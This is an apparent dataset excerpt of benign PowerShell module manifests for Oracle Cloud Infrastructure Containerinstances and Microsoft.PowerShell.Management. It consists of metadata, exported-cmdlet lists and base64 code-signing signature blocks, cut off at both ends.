NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ # MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjM3MDMtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCJ # 2x7cQfjpRskJ8UGIctOCkmEkj6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6dG01DAiGA8yMDI0MDQyMzA0MTcy # NFoYDzIwMjQwNDI0MDQxNzI0WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDp0bTU # AgEAMAoCAQACAjGvAgH/MAcCAQACAhONMAoCBQDp0wZUAgEAMDYGCisGAQQBhFkK # BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ # KoZIhvcNAQELBQADggEBAH2rmFBW9ja5blYWA8Unn8vkMYbXKqIQYgvE+BqIoGGl # K37iId7RCMnbx36GNiPsxJz+SrXFygUQaAu7nO3U+1iyNgO6YujK/u2s9fA90XRP # FvVIFpS+hAqsK4PY/wKNme5yRRbrQqWJOdWisM2Q9ynYZdKQ5v77k3VBy5INheyd # 7Y5mHRAY7C+R69p4O5ljquUnNbyxDY4bnN1qxy9bzlqSNmyvC64VCRL9G4sqNfQq # s0M4jbIp8qeibUdAC7bHhjZ6J97blDYY4midxnoeqd/SQ/aY4Y85sExh7vJTqL3e # +mrW8IHCP9vTqFQEuWFyfKEGFVF7aMJM6l8r65vKP5oxggQNMIIECQIBATCBkzB8 # MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk # bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N # aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAeqaJHLVWT9hYwABAAAB # 6jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE # MC8GCSqGSIb3DQEJBDEiBCD8ADRVGd5l8cCl04nStlHFXXd91SX3rAIpioemchw6 # zTCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICmPodXjZDR4iwg0ltLANXBh # 5G1uKqKIvq8sjKekuGZ4MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAHqmiRy1Vk/YWMAAQAAAeowIgQg+RSQdB8BZiqOVDCLitt1J36/ # frKLmhDLzkN9ACh6oPQwDQYJKoZIhvcNAQELBQAEggIArgCxwEQwsXy3qvXe1GOW # YdqAl33upte4+15wOxHkKnfyRfmMMZkHKxdguoyMHXi57FvEsnLxY0nMyyhu1j9M # BoZN7jzejv2gYcHwfd6jN2R/Wv1mvAQ3gOUH4G2ZCBBPca6nKJxHkTrnV5iAC0/Q # kKZ8bBKcocSMyaJacM+hDu8CYY8HMXRwnMCfeocuC8e96QrgoiVZ2rzow2csY5KX # ETYUK9vqCQFyzi2ULLhn5tL6MIYn3X8Duax4mZItq3G2dG2ZVT+Eu3TZ+cSsOldC # fk/70WJghQfboOrqarI2Q43GQwH25YKOJPkRV7axMNcumEQ7p16XqRgtXDJ3Jqhn # tGxLxHdhEO6uo6ZDHaOGUgm9dBFtqCWPLr8+cXLzMmw2zGVYJymKW+Gx2bGYGgML # BWnor7prnHPg7VlOJq5UJpB+6x/4lw+d1P4vQDLC0YJNB1iP2ngdx60GQyW5qLEV # UQzt/XJB9vDWyCc+e33xLERBJntQQg/vwAXfvAdEFfVs5xL17dom+OYSgLCeLrLm # xA2VYRsNKeFcLHzyzLiPQolsrIhV+4zywDr2Cew/bH2gO1zY9tSiwouLa0s83Cxi # 40P0gjJ35L1Hy54nB60Jwi51EKZ6kWzbHX15vsxX4EcpIfo2BOqIQYne9nE7SIq5 # l6dEKQafLR/nKNuSmsMtvVg= # SIG # End signature block
combined_dataset/train/non-malicious/sample_42_86.ps1
sample_42_86.ps1
# # Module manifest for module 'OCI.PSModules.Containerinstances' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Containerinstances.dll' # Version number of this module. ModuleVersion = '73.1.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '3c897ac4-90c6-4ac2-9c82-899415d38f04' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Containerinstances Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '73.1.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Containerinstances.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIContainerinstancesContainer', 'Get-OCIContainerinstancesContainerInstance', 'Get-OCIContainerinstancesContainersList', 'Get-OCIContainerinstanceshapesList', 'Get-OCIContainerinstancesList', 'Get-OCIContainerinstancesWorkRequest', 'Get-OCIContainerinstancesWorkRequestErrorsList', 'Get-OCIContainerinstancesWorkRequestLogsList', 'Get-OCIContainerinstancesWorkRequestsList', 'Invoke-OCIContainerinstancesRetrieveLogs', 'Move-OCIContainerinstancesContainerInstanceCompartment', 'New-OCIContainerinstancesContainerInstance', 'Remove-OCIContainerinstancesContainerInstance', 'Restart-OCIContainerinstancesContainerInstance', 'Start-OCIContainerinstancesContainerInstance', 'Stop-OCIContainerinstancesContainerInstance', 'Update-OCIContainerinstancesContainer', 'Update-OCIContainerinstancesContainerInstance' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Containerinstances' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_67_77.ps1
sample_67_77.ps1
@{ GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D" Author="PowerShell" CompanyName="Microsoft Corporation" Copyright="Copyright (c) Microsoft Corporation." ModuleVersion="7.0.0.0" CompatiblePSEditions = @("Core") PowerShellVersion="3.0" NestedModules="Microsoft.PowerShell.Commands.Management.dll" HelpInfoURI = 'https://aka.ms/powershell73-help' FunctionsToExport = @() AliasesToExport = @("gcb", "gtz", "scb") CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-ChildItem", "Get-Clipboard", "Set-Clipboard", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Test-Connection", "Remove-ItemProperty", "Rename-ItemProperty", "Resolve-Path", "Set-Content", "Set-ItemProperty", "Get-TimeZone", "Stop-Computer", "Restart-Computer") } # SIG # Begin signature block # MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCC7VSKADi66xWJM # 6HEA1fH30eG2InNZKlDJZkesFZvWeqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIOH5sRkkqFV4tm2L8Ww9Nazk # vwEuj6sw3rJoUClckmtaMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEASw9qPBr2D26c4DJUtEgR1sKtpXKZoemG32esSLn4w3MduZQq0+6+T9xw # VErPr8+5fxrk4TSYNMEaOVNHNZ4DG2PbXpKoZvxTG8ohL/gZxPKzaa7wCMswzCXH # bURyCt+ndFxHrpVQL2Mj1nTf0eyCIzcta7/Y/Nz4gkvC88t8SfTbTqt4e0CqbGuw # R5vkBVdKTVJ6ufdCBCr5IP31ggm6NxcJVBB0xvMK5HZmY2Uw4KSSaL2ATExO/dpe # 9+28PKGF5UMjMpFA2OBL6w2Q9yG6XaxWEgdTqlDtplOpkeROOcZ/FHpmatbhUWBE # 6yGSzrMO83nn2TDas9ByOueXZIyMzKGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC # F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAA0Xk9ogon3tGAm/+JwVPrmpcx7kI3uReVzIdjAxqClQIGZkZGQC/a # GBMyMDI0MDYxMzAxMTcwMC44NDNaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RjAwMi0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHqMIIHIDCCBQigAwIBAgITMwAAAfI+MtdkrHCRlAABAAAB8jANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # NThaFw0yNTAzMDUxODQ1NThaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RjAwMi0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQC85fPLFwppYgxwYxkSEeYvQBtnYJTtKKj2FKxzHx0f # gV6XgIIrmCWmpKl9IOzvOfJ/k6iP0RnoRo5F89Ad29edzGdlWbCj1Qyx5HUHNY8y # u9ElJOmdgeuNvTK4RW4wu9iB5/z2SeCuYqyX/v8z6Ppv29h1ttNWsSc/KPOeuhzS # AXqkA265BSFT5kykxvzB0LxoxS6oWoXWK6wx172NRJRYcINfXDhURvUfD70jioE9 # 2rW/OgjcOKxZkfQxLlwaFSrSnGs7XhMrp9TsUgmwsycTEOBdGVmf1HCD7WOaz5EE # cQyIS2BpRYYwsPMbB63uHiJ158qNh1SJXuoL5wGDu/bZUzN+BzcLj96ixC7wJGQM # BixWH9d++V8bl10RYdXDZlljRAvS6iFwNzrahu4DrYb7b8M7vvwhEL0xCOvb7WFM # sstscXfkdE5g+NSacphgFfcoftQ5qPD2PNVmrG38DmHDoYhgj9uqPLP7vnoXf7j6 # +LW8Von158D0Wrmk7CumucQTiHRyepEaVDnnA2GkiJoeh/r3fShL6CHgPoTB7oYU # /d6JOncRioDYqqRfV2wlpKVO8b+VYHL8hn11JRFx6p69mL8BRtSZ6dG/GFEVE+fV # mgxYfICUrpghyQlETJPITEBS15IsaUuW0GvXlLSofGf2t5DAoDkuKCbC+3VdPmlY # VQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFJVbhwAm6tAxBM5cH8Bg0+Y64oZ5MB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQA9S6eO4HsfB00XpOgPabcN3QZeyipgilcQ # SDZ8g6VCv9FVHzdSq9XpAsljZSKNWSClhJEz5Oo3Um/taPnobF+8CkAdkcLQhLdk # Shfr91kzy9vDPrOmlCA2FQ9jVhFaat2QM33z1p+GCP5tuvirFaUWzUWVDFOpo/O5 # zDpzoPYtTr0cFg3uXaRLT54UQ3Y4uPYXqn6wunZtUQRMiJMzxpUlvdfWGUtCvnW3 # eDBikDkix1XE98VcYIz2+5fdcvrHVeUarGXy4LRtwzmwpsCtUh7tR6whCrVYkb6F # udBdWM7TVvji7pGgfjesgnASaD/ChLux66PGwaIaF+xLzk0bNxsAj0uhd6QdWr6T # T39m/SNZ1/UXU7kzEod0vAY3mIn8X5A4I+9/e1nBNpURJ6YiDKQd5YVgxsuZCWv4 # Qwb0mXhHIe9CubfSqZjvDawf2I229N3LstDJUSr1vGFB8iQ5W8ZLM5PwT8vtsKEB # wHEYmwsuWmsxkimIF5BQbSzg9wz1O6jdWTxGG0OUt1cXWOMJUJzyEH4WSKZHOx53 # qcAvD9h0U6jEF2fuBjtJ/QDrWbb4urvAfrvqNn9lH7gVPplqNPDIvQ8DkZ3lvbQs # 